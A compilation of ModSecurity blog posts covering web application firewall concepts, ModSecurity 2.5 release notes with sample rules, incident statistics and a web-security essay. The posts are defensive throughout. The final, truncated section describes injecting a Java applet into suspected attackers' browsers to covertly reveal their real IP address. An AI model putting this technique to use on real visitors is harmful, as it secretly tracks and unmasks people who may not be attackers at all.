
Web Application Monitoring Data Model

A data model is the foundation of web application monitoring and, thus, key to the successful utilisation of web application firewalls. We don't get to design the model; we can only deduce it from the information the underlying technology provides. What we can do is build on it, and, for that reason, it is very important to understand what we have to work with.

An ideal model is one that helps structure the information available to us, allows us to enrich it with additional pieces of data and generally helps us raise events based on the information it contains.

The major parts of a web application monitoring data model are as follows:

  • Connection - corresponds to one TCP connection.
  • Request - corresponds to one HTTP request.
  • Response - corresponds to one HTTP response.
  • IP Address - the IP address of the client, retrieved from the TCP connection.
  • Session - application session.
  • User - authenticated user; in most cases this translates to the application user, but some sites still use HTTP authentication, and some might use both.
  • Site - perhaps more accurately called Protection domain, or Application. None of these terms is perfect, but I generally prefer to use Site. In our model, Site refers either to the functionality behind an entire domain name (e.g. www.example.com), or only a subset of one (www.example.com/forums/).
  • Country - the country where the request originates.
  • City - the city where the request originates.
  • Custom - any number of custom attributes. For example, you might want to have different policies for different departments within your organisation. To achieve this, you will map client IP addresses to department names, which you will then use to determine policies.
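To make the model concrete, here is a minimal sketch in Python of how these components might map onto a data structure. All names, and the IP-to-department mapping, are illustrative assumptions rather than any particular WAF's implementation:

```python
from dataclasses import dataclass, field
from typing import Optional

@dataclass
class Transaction:
    """One HTTP request/response pair, enriched with derived attributes."""
    # Directly available from the underlying technology
    remote_ip: str                      # from the TCP connection
    request_line: str                   # e.g. "GET /forums/ HTTP/1.1"
    response_status: int
    # Derived or enriched attributes
    site: Optional[str] = None          # protection domain, e.g. "www.example.com/forums/"
    session_id: Optional[str] = None    # requires session-identification logic
    user: Optional[str] = None          # requires detecting a login event
    country: Optional[str] = None       # e.g. from a GeoIP lookup on remote_ip
    custom: dict = field(default_factory=dict)  # e.g. {"department": "accounting"}

# Example of a custom attribute: map client IP prefixes to department
# names (the mapping below is hypothetical) to drive per-department policies.
DEPARTMENTS = {"10.0.1.": "accounting", "10.0.2.": "engineering"}

def assign_department(tx: Transaction) -> None:
    for prefix, dept in DEPARTMENTS.items():
        if tx.remote_ip.startswith(prefix):
            tx.custom["department"] = dept

tx = Transaction(remote_ip="10.0.1.42", request_line="GET / HTTP/1.1", response_status=200)
assign_department(tx)
```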

Most of the components are easy to construct, mapping from the structures used in programming, but there are a few places where the technology does not support the view, or where what we are given is not what we want to see:

  • Some work is needed to be able to distinguish sessions. There are different session identifier techniques to consider (e.g. in the URI, in a parameter, in a cookie). While there are a number of platforms that have standardised session management, there is also a large number of applications using their own schemes, so in general some custom work will be needed.
  • Even more work is needed for user identification. Building on session identification, one needs to identify a successful login event in the traffic in order to determine the session username.
  • The IP address may not be accurate. It may be that of an intermediary, and not of the client itself. Such cases can sometimes be identified (as is the case with HTTP proxies), but not always (e.g. if a transparent HTTP proxy is used). The problem is that, unless you control the proxy, you can only rely on the IP address you got from the TCP stack; the information extracted from HTTP request headers is not to be trusted.

Note: This post is part of the Web Application Firewall Concepts series.

 

Web Application Firewall Use Case: Continuous Security Assessment

After some deliberation, I have decided to add Continuous security assessment as a standalone item on my web application firewall use cases list. Although some could argue the functionality is already covered in the Web intrusion detection and prevention section, it is not obvious—you have to understand this field in order to know it is there.

Continuous security assessment is not specific to web application firewalls—it's been used for the network layer for years—but web application firewalls are more useful for web applications (than IDS tools are for network applications), simply because there's essentially one data format to analyse (if you can call a bunch of loosely related specifications used by web applications "one" data format). With web applications, you get to see a clear picture of application input and output. Therefore, with proper parsing and analysis in place, it's almost like having a direct communication channel with the application itself.

The focus here is not on the attacks and other suspicious client behaviour, which comes out of the stock IDS/IPS functionality, but on everything else:

  • application defects,
  • information leakage,
  • configuration errors,
  • change control

and so on. The advantage is that you can detect some very subtle issues, only possible because of the depth of analysis.

Just as an extreme example, there are quite a few web applications out there where SQL injection (less often) and XSS (surprisingly common) exist by design—their clients are allowed and expected to send such low-level stuff and have it executed by the server. These types of problems can be detected early and with little effort, and because assessment never stops, you get an alert as soon as they manifest.
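A toy sketch of the passive-assessment idea: scan outbound response bodies for signatures of defects and information leakage. The patterns below are purely illustrative assumptions; production rule sets are far more extensive:

```python
import re

# Illustrative signatures of defects and leakage in outbound responses.
LEAK_PATTERNS = {
    "sql_error":   re.compile(r"(?:SQL syntax.*?near|ORA-\d{5}|ODBC Driver)", re.I),
    "stack_trace": re.compile(r"(?:at [\w.$]+\(\w+\.java:\d+\)|Traceback \(most recent call last\))"),
    "credit_card": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
}

def assess_response(body: str) -> list[str]:
    """Return the names of all leakage signatures found in a response body."""
    return [name for name, pattern in LEAK_PATTERNS.items() if pattern.search(body)]
```

Because the check runs on every response, a defect introduced by tomorrow's code push is flagged the first time it leaks, which is the "assessment never stops" property described above.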

Note: This post is part of the Web Application Firewall Concepts series.

 

Web Application Firewall Use Cases

There are many reasons to use a web application firewall. Most people tend to focus on prevention and blocking when the term is brought up, but that is just one of the possible uses. Three years ago, almost to the day, I wrote this post to argue how one needs a WAF to serve as a part of the overall defence strategy. My opinion remains unchanged today, but I have since expanded the list of use cases for web application firewalls. Here they are:

  1. Web intrusion detection and prevention. Applying the principles of external traffic monitoring (IDS) and prevention (IPS) to HTTP and the related technologies, which are used to build web applications. Through your WAF you will look for signs of generic web application attacks (negative security model), or deploy a learning engine to construct a model of your site and reject all invalid traffic, not just attacks (also known as positive security model).
  2. Continuous security assessment. The idea with this case is to emphasize the fact that web application firewalls actually understand web applications pretty well. Armed with this knowledge, they can do more than detect attacks; they can observe signs of weaknesses, information leaks, configuration errors, and similar problems before an attempt to exploit them is made.
  3. Virtual (or just-in-time) patching. When you need to deal with a specific problem in your web site, which exists either in your code or in the code of the product you are relying on. The focus in this use case is on writing custom rules to deal with custom issues.
  4. HTTP traffic logging and monitoring. Do you know what is actually going on in your web applications? Who are your users and how are they using your systems? Are you being attacked and how?
  5. Network building blocks. This use case is not often a primary motivator for WAF deployment, but if you're already deploying a reverse proxy to serve as an HTTP switch/router, making the device security-aware is the way to go.
  6. Web application hardening. If you deploy your WAF as a reverse proxy then you can get it to modify the traffic stream to fix some of the design faults of your application or the HTTP protocol.

I will expand on each use case in my future posts.
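As a small taste of the hardening use case, a reverse proxy can rewrite outbound Set-Cookie headers to add the HttpOnly and Secure flags an application forgot to set. This is only a sketch of the idea, not any product's implementation:

```python
def harden_set_cookie(header_value: str) -> str:
    """Append HttpOnly and Secure flags to a Set-Cookie header if missing.

    A reverse-proxy WAF can apply this to every outbound response,
    fixing a design fault without touching the application code.
    """
    flags = header_value.lower()
    if "httponly" not in flags:
        header_value += "; HttpOnly"
    if "secure" not in flags:
        header_value += "; Secure"
    return header_value
```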

Note: This post is part of the Web Application Firewall Concepts series.

 

Web Application Firewall Concepts

I went through all my ModSecurity Blog posts yesterday, partly to admire myself for blogging consistently for almost 5 years and partly to understand what it is that I talked about during this time. While I knew that most of my posts were pretty technical (after all, I did start my new blog to focus on other things), imagine my surprise when I realised I hadn't properly covered the one thing this blog is supposed to cover: web application firewalls! The emphasis is on the word "properly": I provided a great deal of technical information but not enough content that would explain why one would deploy a web application firewall and how. This stuff had gone into my conference talks and the Web Application Firewall Evaluation Criteria project, but I forgot to discuss the topics here.

In an effort to fix this I am starting a series of blog posts called Web Application Firewall Concepts. Each post will be reasonably brief and cover one aspect of the technology, and I will continually update this post to serve as a table of contents.

Posts in this series:

  1. Use Cases
    1. Web intrusion detection and prevention
    2. Continuous Security Assessment
    3. Virtual (or just-in-time) patching
    4. HTTP traffic logging and monitoring
    5. Network building blocks
    6. Web application hardening
  2. Deployment models
    1. Inline
    2. Out of line
    3. Embedded
  3. Data Model
    1. Model construction
    2. Persisting information across requests
    3. Distinguishing sessions
    4. Distinguishing users
  4. Analysis Model
    1. Negative security
    2. Positive security
    3. Anomaly scoring
    4. Learning
    5. Evasion
    6. Impedance mismatch
  5. Traffic logging
  6. Special protection techniques
    1. Cookie protection
    2. Cross-Site Request Forgery
    3. Brute force attacks
    4. Denial of Service attacks
    5. PDF UXSS protection

 

ModSecurity User Survey

With the release of ModSecurity 2.5 yesterday, this seemed like the perfect time to get feedback from the user community. The 2.5 release is important as it includes many features that were identified by the user community, which highlights the need for us (Breach) to have a full understanding of how people are using ModSecurity and any challenges you are facing.

With this in mind, we have put together the first ModSecurity User Survey.

I urge everyone to please take about 5 minutes and fill out the survey. With this information, we will be able to map out areas where we need to focus research and development, both in the ModSecurity code itself and in the rule sets and supporting tools.

We will leave the survey open until the end of March.

Thanks for your time everyone.

 

ModSecurity 2.5 Released

The final version of ModSecurity 2.5.0, the long awaited next stable version of ModSecurity, is now available. This release offers quite a few new features: set-based matching, a wider variety of string matching operators, transformation caching, support for writing rules as Lua scripts, credit card number validation, enhanced means for maintaining and customizing third party rulesets, and quite a few other features. Take a look at the main website to see a summary of the new features.

Getting ModSecurity

As always, send questions/comments to the community support mailing list. You can download the latest releases, view the documentation and subscribe to the mailing list at www.modsecurity.org.

Building ModSecurity 2.5

The documentation has been updated with a new build process for 2.5. The new process uses the typical 'configure', 'make' and 'make install' approach instead of having to hand edit a Makefile as in previous releases. This approach allows for a generally easy build for those with libraries in standard locations, but also some flexibility for those with unique systems. You can take a look at more details in the installation section of the documentation.

 

Web Hacking Incidents Database Annual Report for 2007

Breach Labs, which sponsors WHID, has issued an analysis of the Web hacking landscape in 2007 based on the incidents recorded at WHID. It took some time, as we added the recently introduced attributes to all 2007 incidents and mined the data to find the juicy stuff:

  • The drivers, business or other, behind Web hacking.
  • The vulnerabilities hackers exploit.
  • The types of organizations attacked most often.

To be able to answer those questions, WHID tracks the following key attributes for each incident:

  • Attack Method - The technical vulnerability exploited by the attacker to perform the hack.
  • Outcome - the real-world result of the attack.
  • Country - the country in which the attacked web site (or owning organization) resides.
  • Origin - the country from which the attack was launched.
  • Vertical - the field of operation of the organization that was attacked.
Key findings were:

  • 67% of the attacks in 2007 were "for profit" motivated. Ideological hacking came second.
  • At 20%, good old SQL injection dominated as the most common technique used in the attacks. XSS finished 4th with 12%, and the young and promising CSRF is still only seldom exploited out there and was included in the "others" group.
  • Over 44% of incidents were tied to non-commercial sites such as government and education. We assume that this is partially because incidents happen more in these organizations and partially because these organizations are more inclined to report attacks.
  • On the commercial side, internet-related organizations top the list. This group includes retail shops (comprising mostly e-commerce sites), media companies and pure internet services such as search engines and service providers. It seems that these companies do not compensate, with proper security procedures, for the higher exposure they incur.
  • In incidents where records leaked or were stolen, the average number of records affected was 6,000.
The full report can be found at Breach Security Network.

 

Tangible ROI of a Web Application Firewall (WAF)

One of the challenges facing organizations that need to increase the security of their web applications is to concretely provide appropriate "Return On Investment" (ROI) for procurement justification. Organizations can only allocate a finite amount of budget towards security efforts therefore security managers need to be able to justify any commercial services, tools and appliances they want to deploy. As most people who have worked in information security for an extended period of time know, producing tangible ROI for security efforts that address business driver needs is both quite challenging and critically important.

The challenge for security managers is to not focus on the technical intricacies of the latest complex web application vulnerability or attack. C-level Executives do not have the time, and in most instances the desire, to know the nuances of an HTTP Request Smuggling attack. That is what they are paying you for! Security managers need to function as a type of liaison where they can take data from the Subject Matter Experts (SMEs) and then translate that into a business value that is important to the C-level Executive.

One almost guaranteed pain point for most executives is vulnerability scan reports presented by auditors. The auditors are usually brought in from, and report to, a higher-level third party (be it OMB in the Government or PCI for Retail). Executives like to see "clean vulnerability scan reports." While a clean report will certainly not guarantee that your web application is 100% secure, it can certainly help to prove the counter-argument. And to make matters worse, nothing is more frustrating to upper Management than auditor reports listing repeat vulnerabilities that either never go away or pull the "Houdini" trick (they disappear for a while only to suddenly reappear). Sidebar: see Jeremiah Grossman's Blog post for examples of this phenomenon. These situations are usually attributed to breakdowns in the Software Development Life Cycle (SDLC), where code updates are too time consuming or the change control processes are poor.

This is one of the best examples of where a Web Application Firewall can prove its ROI.

At Breach Security, we receive many inbound calls from prospects who are interested in WAF technology but are lacking that "Big Stick" that helps convince upper management to actually make the purchase. The best scenario we have found is to suggest a "Before and After" comparison of a vulnerability scan report while they are testing the WAF on their network. The idea is to deploy the WAF in block mode and then initiate a rescan of a protected site. The difference in the reduction of findings is an immediate, quantitative ROI.

Here is a real example. One of our current customers followed this exact roadmap and this is a summary (slightly edited to remove sensitive information) of the information they sent back to us:

Our WAF is installed and running. I have tested its impact on www.example.com and it is operating very admirably. This morning I had the vulnerability scanning team run an on-demand scan to test the efficacy of the appliance, and I was very impressed with the results. Our previous metrics for www.example.com in the last scan were 64 vulnerabilities, across all outside IP addresses (including www.example.com, example2.com, example3.com, etc.) and with the Breach appliance in place, the metric from today's scan was 5 vulnerabilities, with details:

- High vulnerabilities dropped from 38 to 0
- Medium vulnerabilities dropped from 12 to 0
- 1 low vulnerability remains due to simply running a web server (we will eliminate this via exception)
- 1 low vulnerability due to a file/folder naming convention that is typical and attracts unwanted attacks (will be eliminated via rule addition)

Bear in mind that I have applied the appliance with a basic (almost strictly out-of-the-box) configuration and ruleset to protect only www.example.com (192.168.1.100 in the report), and the 35 warnings that remain are for the other websites, and would similarly disappear when protected by the appliance. In my opinion, this was a very successful test that indicates the effectiveness of the appliance.

So, looking at the report after the WAF was in place, the www.example.com web site removed 38 high and 12 medium vulnerabilities and left only 2 low ones (which are really just informational notices). That is pretty darn good and that was just with the default, generic detection ModSecurity rule set! Hopefully this information has helped to provide a possible use-case testing scenario to show tangible ROI of a WAF.

In a future post, I will discuss how custom WAF rule sets can be implemented to address more complex vulnerability issues identified not by a scanner but by actual people who have performed a web assessment/pentest.

 

Is Your Website Secure? Prove It.

The recent Geeks.com compromise and subsequent articles have created a perfect storm of discussion topics and concerns related to web security. The underlying theme is that true web security encompasses much more than a Nessus scan from an external company.

The concepts (and much of the text) in this post are taken directly from a blog post by Richard Bejtlich on his TaoSecurity site. I have simply tailored the concepts specifically to web security. Thanks goes to Richard for always posting thought provoking items and making me look at web security through a different set of eyes. You know what they say about imitation ;)

The title of this post forms the core of most of my recent thinking on web application security. Since I work for a commercial web application firewall company and am the ModSecurity Community Manager, I often get the chance to talk with people about web application security. While I am not a "sales" guy, I do hang out at our vendor booth when we are at conferences. I am mainly there to field technical questions and just interact with people. I have found that the title of this post is actually one of the absolute best questions to ask someone when they first come up to our booth. It always sparks interesting conversation and can shed light onto specific areas of strength and weakness.

What does it mean to be secure?

Obviously, having logos posted on a web site that tout "we are secure" is really just a marketing tactic aimed to reassure potential customers that it is safe to purchase goods at the site. The reality is that these logos are unreliable and make no guarantee as to the real level of security offered by the web site. At best, they are an indication that the web site has met some sort of minimum standard. But that is a far cry from actually being secure.

Let me expand "secure" to mean the definition Richard provided in his first book: Security is the process of maintaining an acceptable level of perceived risk. He defined risk as the probability of suffering harm or loss. You could expand my six word question into are you operating a process that maintains an acceptable level of perceived risk for your web application?

Let's review some of the answers you might hear to this question. I'll give an opinion regarding the utility of each answer as well. For the purpose of this exercise, let's assume it is possible to answer "yes" to this question. In other words, we just don't answer "no." We could all make arguments as to why it's impossible to be secure, but does that really mean there is no acceptable level of perceived risk in which you could operate? I doubt it. Let's take a look at the various levels of responses.

So, is your website secure? Prove it.

1. Yes.

Then, crickets (i.e., silence, for you non-imaginative folks). This is completely unacceptable. The failure to provide any kind of proof is security by belief. We want security by fact. Think of it this way: would auditors accept this answer? Could you pass a PCI audit by simply responding "yeah, we are secure"? Nope, you need to provide evidence.

2. Yes, we have product X, Y, Z, etc. deployed.

This is better, but it's another expression of belief and not fact. The only fact here is that technologies can be abused, subverted, and broken. Technologies can be simultaneously effective against one attack model and completely worthless against another.

This also reminds me of another common response I hear and that is - yes, we are secure because we use SSL. Ugh... Let me share with you one personal experience that I had with an "SSL Secured" website. Awhile back, I decided to make an online purchase of some herbal packs that can be heated in the microwave and used to treat sore muscles. When I visited the manufacturer's web site, I was dutifully greeted with a message "We are a secure web site! We use 128-bit SSL Encryption." This was reassuring as I obviously did not want to send my credit card number to them in clear text. During my checkout process, I decided to verify some general SSL info about the connection. I double-clicked on the "lock" in the lower-right hand corner of my web browser and verified that the domain name associated with the SSL certificate matched the URL domain that I was visiting, that it was signed by a reputable Certificate Authority such as VeriSign, and, finally, that the certificate was still valid. Everything seemed in order so I proceeded with the checkout process and entered my credit card data. I hit the submit button and was then presented with a message that made my stomach tighten up. The message is displayed next; however, I have edited some of the information to obscure both the company and my credit card data.

The following email message was sent:

To:companyname@aol.com
From: RCBarnett@email.com
Subject:ONLINE HERBPACK!!!
name: Ryan Barnett
address: 1234 Someplace Ct.
city: Someplace
state: State
zip: 12345
phone#:
Type of card: American Express
name on card: Ryan Barnett
card number: 123456789012345
expiration date: 11/05
number of basics:
Number of eyepillows:
Number of neckrings: 1
number of belted: 1
number of jumbo packs:
number of foot warmers: 1
number of knee wraps:
number of wrist wraps:
number of keyboard packs:
number of shoulder wrap-s:
number of cool downz:
number of hats-black:
number of hats-gray:
number of hats-navy:
number of hats-red:
number of hats-rtcamo:
number of hats-orange:
do you want it shipped to a friend:
name:
their address:
their city:
their state:
their zip:
  
cgiemail 1.6

I could not believe it. It looked as though they had sent out my credit card data in clear-text to an AOL email account. How could this be? They were obviously technically savvy enough to understand the need to use SSL encryption when clients submitted their data to their web site. How could they then not provide the same due diligence on the back-end of the process?

I was hoping that I was somehow mistaken. I saw a banner message at the end of the screen that indicated that the application used to process this order was called "cgiemail 1.6." I therefore hopped on Google and tried to track down the details of this application. I found a hit in Google that linked to the cgiemail webmaster guide. I quickly reviewed the contents and found what I was looking for in the "What security issues are there?" section:

Interception of network data sent from browser to server or vice versa via network eavesdropping. Eavesdroppers can operate from any point on the pathway between browser and server.

Risk: With cgiemail as with any form-to-mail program, eavesdroppers can also operate on any point on the pathway between the web server and the end reader of the mail. Since there is no encryption built into cgiemail, it is not recommended for confidential information such as credit card numbers.

Shoot, just as I suspected. I then spent the rest of the day contacting my credit card company about possible information disclosure and to place a watch on my account. I also contacted the company by sending an email to the same AOL address outlining the security issues that they needed to deal with. To summarize this story: Use of SSL does not a "secure site" make.

3. Yes, we are PCI compliant.

Generally speaking, regulatory compliance is usually a check-box paperwork exercise whose controls lag attack models of the day by one to five years, if not more. PCI is somewhat of an exception as it attempts to be more operationally relevant and address more current web application security issues. While there are some admirable aspects of PCI, please keep this mantra in mind -

It is much easier to pass a PCI audit if you are secure than to be secure because you pass a PCI audit.

PCI, like most other regulations, is a minimum standard of due care, and passing the audit does not make your site "unhackable." A compliant enterprise is like feeling an ocean liner is secure because it left dry dock with life boats and jackets. If regulatory compliance is more than a paperwork self-survey, we approach the realm of real evidence. However, I have not seen any compliance assessments which measure anything of operational relevance. Check out Richard's Blog posts on Control-Compliant security for more details on this concept and why it is inadequate. What we really need is more of a "Field-Assessed" mode of evaluation. I will discuss this concept more in depth in future Blog posts.

4. Yes, we have logs indicating we prevented web attacks X, Y, and Z (SQL Injection, XSS, etc...).

This is getting close to the right answer, but it's still inadequate. For the first time we have some real evidence (logs) but these will probably not provide the whole picture. I believe that how people deploy and use a WAF is critical. Most people deploy a WAF in an "alert-centric" configuration which will only provide logs when a rule matches. Sure, these alert logs indicate what was identified and potentially stopped, but what about activities that were allowed? Were they all normal, or were some malicious but unrecognized by the preventative mechanism? Deploying a WAF as an HTTP level auditing device is a highly under-utilized deployment option. There is a great old quote that sums up this concept -

"In an incident, if you don't have good logs (i.e. auditing), you'd better have good luck."

5. Yes, we do not have any indications that our web applications are acting outside their expected usage patterns.

Some would call this rationale the definition of security. Whether or not this answer is acceptable depends on the nature of the indications. If you have no indications because you are not monitoring anything, then this excuse is hollow. If you have no indications and you comprehensively track the state of a web application, then we are making real progress. That leads to the penultimate answer, which is very close to ideal.

6. Yes, we do not have any indications that our web applications are acting outside their expected usage patterns, and we thoroughly collect, analyze, and escalate a variety of network-, host-, and web application-based evidence for signs of violations.

This is really close to the correct answer. The absence of indications of intrusion is only significant if you have some assurance that you've properly instrumented and understood the web application. You must have trustworthy monitoring systems in order to trust that a web application is "secure." The lack of robust audit logs is usually the reason why organizations cannot provide this answer. Put it this way: Common Log Format (CLF) logs are not adequate for full web-based incident response. Too much data is missing. If this is really close, why isn't it correct?

7. Yes, we do not have any indications that our web applications are acting outside their expected usage patterns, and we thoroughly collect, analyze, and escalate a variety of network-, host-, and web application-based evidence for signs of violations. We regularly test our detection and response people, processes, and tools against external adversary simulations that match or exceed the capabilities and intentions of the parties attacking our enterprise (i.e., the threat).

Here you see the reason why number 6 was insufficient. If you assumed that number 6 was OK, you forgot to ensure that your operations were up to the task of detecting and responding to intrusions. Periodically you must benchmark your perceived effectiveness against a neutral third party in an operational exercise (a "red team" event). A final assumption inherent in all seven answers is that you know the assets you are trying to secure, which is no mean feat. Think of this practical exercise: if you run a zero-knowledge (meaning unannounced to operations staff) web application penetration test, how does your organization respond? Do they even notice the penetration attempts? Do they report it through the proper escalation procedures? How long does it take before additional preventative measures are employed? Without answers to this type of "live" simulation, you will never truly know if your monitoring and defensive mechanisms are working.

Conclusion

Indirectly, this post also explains why doing only one of the following does not adequately ensure "security": web vulnerability scanning, penetration testing, deploying a web application firewall, or log analysis. While each of these tasks excels in some areas and aids in the overall security of a website, each is also ineffective in other areas. It is the overall coordination of these efforts that will provide organizations with, as Richard would say, a truly "defensible web application."

 

ModSecurity 2.5 Status

The ModSecurity 2.5 release is scheduled for early/mid February. With the ModSecurity 2.5 release just around the bend, I have been spending my time doing a lot of testing, tweaking and polishing. I would like ModSecurity 2.5 and the core rule set (or any of the commercial rule sets Breach offers) to be easier to integrate into your environment. Ofer Shezaf and Avi Aminov are hard at work developing and tuning the core rule sets, and along with this come requests from them for features to make integration and configuration easier. Because of this, I have included a few new features in ModSecurity 2.5 to make things easier for rule set authors. What this means is that it is time for the next release candidate of ModSecurity 2.5, 2.5.0-rc2. This release focuses primarily on making generic rule sets (such as the core rule set) easier to configure and customize for your sites.

Taming the Rule Set

ModSecurity does not give you much without a good rule set. However, good rule sets are time-consuming to develop and require a lot of testing and tuning. More people benefit from a generic rule set, but these can be time-consuming to customize for your sites while still allowing an easy upgrade path when new rule sets are released. For those of you who keep track of the community mailing list, you have undoubtedly seen the many false positive comments and requests for help getting generic rules to fit in a custom environment. A generic rule set will not work for everyone out of the box and will need to be tailored to fit. But tailoring can mean local modifications, and that may mean a lot of extra time spent retesting and reapplying modifications when it comes time to upgrade the rule set. Ryan Barnett has some excellent articles on how to deal with modifying a rule set in the least intrusive manner. However, I want to introduce some new functionality I have added to ModSecurity 2.5 to help deal with customizing rule sets without actually touching the rules -- making upgrades easier and less time-consuming.

One of the biggest concerns over a generic third party rule set is that of policy. To block or not to block, that is the question. Some installers prefer just logging, others blocking via HTTP 403, some via HTTP 500, and others prefer dropping the connection altogether with a TCP reset. In past versions of ModSecurity, this usually meant rule set authors had to include two versions of their rules, one for logging only and another for blocking. If this was not done, then the rule set installer would have to manually change all the actions in a rule set that were not to the installer's liking. With ModSecurity 2.5, this blocking decision can now more easily be that of the rule set installer instead of the rule set author.

A new "block" action has been added to ModSecurity 2.5 to allow a rule set to specify where blocking is intended without actually specifying how to perform the blocking. The how is left up to the rule set installer, including the choice of not blocking at all. Currently this is done via inheritance (the existing SecDefaultAction directive), but it is also enhanced via the new SecRuleUpdateActionById directive. Future versions of ModSecurity will make this even more flexible.
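To illustrate the semantics, here is a simplified Python model (not ModSecurity internals; the function and action lists are illustrative only) of how "block" defers the disruptive action to whatever the installer set in SecDefaultAction:

```python
# Simplified model of "block" action resolution. A rule either hard-codes a
# disruptive action, says "block" (defer to the installer's default), or says
# nothing (plain inheritance from SecDefaultAction).
DISRUPTIVE = {"pass", "deny", "drop", "redirect", "allow"}

def resolve_disruptive(rule_actions, default_actions):
    """Return the disruptive action a rule will effectively use."""
    # The installer's default disruptive action, e.g. from SecDefaultAction.
    default = next(
        (a for a in default_actions if a.split(":")[0] in DISRUPTIVE), "pass")
    for a in rule_actions:
        name = a.split(":")[0]
        if name == "block":
            return default            # installer's choice wins
        if name in DISRUPTIVE:
            return a                  # rule author hard-coded the action
    return default                    # nothing specified: plain inheritance
```

For example, a rule with `t:none,block` under a default of `phase:2,pass,log` resolves to `pass`, while a rule that hard-codes `deny,status:500` keeps `deny` regardless of the default.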

Take the following rule set as an example. It will deny and log any request that is not a GET, POST or HEAD. So, things like PUT, TRACE, etc. will be denied with an HTTP 500 status even though the installer specified a default of "pass".

# Default set in the local config
SecDefaultAction "phase:2,pass,log,auditlog"

# In a 3rd party rule set
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "phase:1,t:none,deny,status:500"

With the new "block" action, this could be rewritten as in the following example. In this example the blocking action is, well, not to block ("pass" specified in the SecDefaultAction). This could easily be changed by the installer to "deny,status:501", "drop", "redirect:http://www.example.tld/", etc. The important thing to note here is that the installer is making the choice, not the rule set author.

# Default set in the local config
SecDefaultAction "phase:2,pass,log,auditlog"

# In a 3rd party rule set
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "phase:1,t:none,block"

So now some of you are (or maybe should be) questioning how this new "block" action differs from just not explicitly specifying a disruptive action in the rule to begin with and letting the inheritance work as designed. Well, there is not really that much difference at first glance. The named action is a little bit cleaner to read, but there are really two main differences. The first is that future versions of ModSecurity can expand on how you define and customize "block" in more detail. The second lies in what "block" is doing: it explicitly reverts back to the default disruptive action, which leads into the next new feature.

Let me start off with another example (okay, it is the same example, but it is easy to follow). Below, there is no way to change the disruptive action other than editing the third party rule in place or replacing the rule with a local copy. The latter is better for maintenance, but it means keeping a local copy of the rule around which may require maintenance during a rule set upgrade.

# Default set in the local config
SecDefaultAction "phase:2,pass,log,auditlog"

# In a 3rd party rule set
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "id:1,phase:1,t:none,deny,status:500"

# Replace with a local copy of the rule
SecRuleRemoveById 1
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "id:1,phase:1,t:none,pass"

With ModSecurity 2.5, you can instead update the action to make it do something else. This is done via the new SecRuleUpdateActionById directive. It has the added benefit that if the third party rule set is upgraded later on (provided the id is the same, which it should be - hint), there is no editing required for the local copy of the customization. In fact, there is no local copy to edit at all.

# Default set in the local config
SecDefaultAction "phase:2,pass,log,auditlog"

# In a 3rd party rule set
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "id:1,phase:1,t:none,deny,status:500"

# Update the default action explicitly
SecRuleUpdateActionById 1 "pass"

You should notice in the last example that what I did was to change the third party rule back to what I originally specified in the SecDefaultAction. If only there was a way to just tell the rule to use the default. This is where the second reason for "block" comes into play (thought I forgot about that, eh). Instead of explicitly specifying the disruptive action, you can just specify it as "block" and it will instead force the rule to revert back to the last default action. In this example that is a "pass". This is just as if the rule author had specified "block" instead of "deny".

# Default set in the local config
SecDefaultAction "phase:2,pass,log,auditlog"

# In a 3rd party rule set
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "id:1,phase:1,t:none,deny,status:500"

# Revert the rule back to the default disruptive action, "pass"
SecRuleUpdateActionById 1 "block"

The new SecRuleUpdateActionById directive is not limited to only disruptive actions. You can update nearly any action. The only imposed limit is that you may not change the ID of a rule. However, some care should be taken for actions that are additive (transformations, ctl, setvar, etc.) as these actions are not replaced, but appended to. For transformations, however, you can "replace" the entire transformation chain by specifying "t:none" as the first transformation in the update (just as you would when inheriting from SecDefaultAction).

New Build Method and Automated Tests

Another big change in this release is the build process. ModSecurity 2.5 is now built with a more automated method. No more editing a Makefile. Instead, a configure script was added to automate the creation of a Makefile by searching for the location of all dependencies. Additionally, I added a number of automated tests to ensure operators and transformations are working as expected (executed via "make test").

# Typical build procedure is now:
./configure
make
make test
sudo make install

Other Notable Changes in this Release

There are a few other minor additions and changes in this second release candidate as well.

  • The mlogc tool is now included with the ModSecurity 2.5 source.
  • To help reduce assumptions, the default action is now a minimal "phase:2,log,pass" with no default transformations performed.
  • A new SecUploadFileMode directive is available to explicitly set the file permissions for uploaded files. This allows easier integration with external analysis software (virus checkers, etc.).
  • To help reduce the risk of logging sensitive data, the query string is no longer logged in the error log.
  • Miscellaneous fixes for removing rules via SecRuleRemoveBy* directives.

How You Can Help

As you can see there are a lot of new features and enhancements in ModSecurity 2.5. I hope to see some good feedback from the release candidates so that we can get ModSecurity 2.5 polished up and the stable 2.5.0 available as soon as possible. Installing and testing in your environment is a great help, but there are other ways you can help.

  • Read through and give suggestions for improvements to the documentation.
  • Run through the new build/install procedure and give suggestions on how it can be improved.
  • Tell us how you are using ModSecurity and where your biggest challenges are and where you might be hitting limitations.

Getting ModSecurity

As always, send questions/comments to the community support mailing list. You can download the latest releases, view the documentation and subscribe to the mailing list at www.modsecurity.org.

 

Content Injection Use Case Example

ModSecurity 2.5 introduces a really cool, yet somewhat obscure feature called Content Injection. The concept is pretty interesting as it allows you to inject any text data that you want into the response bodies of your web application.

Identifying Real IP Addresses of Web Attackers

One of the biggest challenges of doing incident response during web attacks is trying to trace the source IP address information back to the "real" attacker's computer. The reason this is so challenging is that attackers almost always loop their attacks through numerous open proxy servers or other compromised hosts where they set up connection tunnels. This means that the IP address that shows up in the victim's logs is most likely only the last hop between the attacker and the target site. One way to tackle this problem is, instead of relying on the TCP/IP address information of the connection, to attempt to handle it at the HTTP layer.

Web security researchers (such as Jeremiah Grossman) have conducted quite a bit of research into how blackhats can send malicious javascript/java to clients. Once the code executes, it can obtain the client's real (internal NAT) IP address. With this information, the javascript code can do all sorts of interesting stuff such as port scan the internal network. In our scenario, the client is not an innocent victim but instead a malicious client who is attacking our site. The idea is that the code we send to the client will execute locally, grab their real IP address and then post the data back to a URL location on our site. With this data, we can then perhaps initiate a brand new incident response engagement focusing in on the actual origin of the attacks!

The following rule uses the same data as the previous example, except this time, instead of simply sending an alert pop-up box we are sending the MyAddress.class java applet. This code will force the attacker's browser to initiate a connection back to our web server.

